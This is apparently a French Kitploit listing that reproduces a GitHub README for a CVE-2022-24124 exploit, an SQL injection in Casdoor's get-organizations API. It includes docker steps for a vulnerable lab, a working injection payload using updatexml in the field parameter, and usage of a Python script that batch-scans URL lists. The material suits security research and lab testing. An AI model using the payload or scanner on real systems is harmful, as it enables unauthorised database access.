Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-24124 — CVE-2022-24124 exploit | Kitploit
Outils/GitHubGitHub/b1gdog/cve-2022-24124
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubb1gdog/cve-2022-24124

CVE-2022-24124

CVE-2022-24124 exploit

Voir le dépôt
22il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Préface

Casdoor est une plateforme d'authentification centralisée à authentification unique (SSO) basée sur OAuth 2.0/OIDC.


Identifiant

Identifiant CVE : CVE-2022-24124

Identifiant CNPD : CNPD-202201-7304


Versions affectées

Niveau de risque : Élevé (7.5 HIGH)

POC/EXP : Déjà divulgué

Casdoor < Casdoor 1.13.1 // Toutes les versions antérieures à 1.13.1 sont affectées.


Description de la vulnérabilité

Cette vulnérabilité est une injection SQL. L'API de requête présente une vulnérabilité d'injection SQL liée aux paramètres de champ et de valeur, comme le montre l'API api/get-organizations.


Reproduction

Récupérer l'image de la vulnérabilité

docker pull vulfocus/casdoor:1.13.0

Téléchargement Docker

Lancer l'environnement vulnérable

docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Lancement Docker

Ouvrir la page de l'environnement vulnérable

http

Utiliser le POC pour construire le payload

POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

1661963474975


Script de vérification en un clic

Avertissement : Cet outil est uniquement destiné à la recherche en sécurité ou aux tests de pénétration autorisés. Toute utilisation illégale est de votre seule responsabilité. Les auteurs déclinent toute responsabilité.

root@kitploit:~
python3 CVE-2022-24124.py -h

image

root@kitploit:~
python3 CVE-2022-24124.py -u http://127.0.0.1

image

root@kitploit:~
python3 CVE-2022-24124.py -f urls.txt

image


Informations connexes

https://nvd.nist.gov/vuln/detail/CVE-2022-24124

https://github.com/ColdFusionX/CVE-2022-24124

https://github.com/0xAbbarhSF/CVE-2022-24124

Inspiré de https://www.t00ls.com/thread-66989-1-1.html

J'ai écrit une version Python pour m'entraîner et j'ai ajouté une fonction de détection par lots.

Télécharger l’outil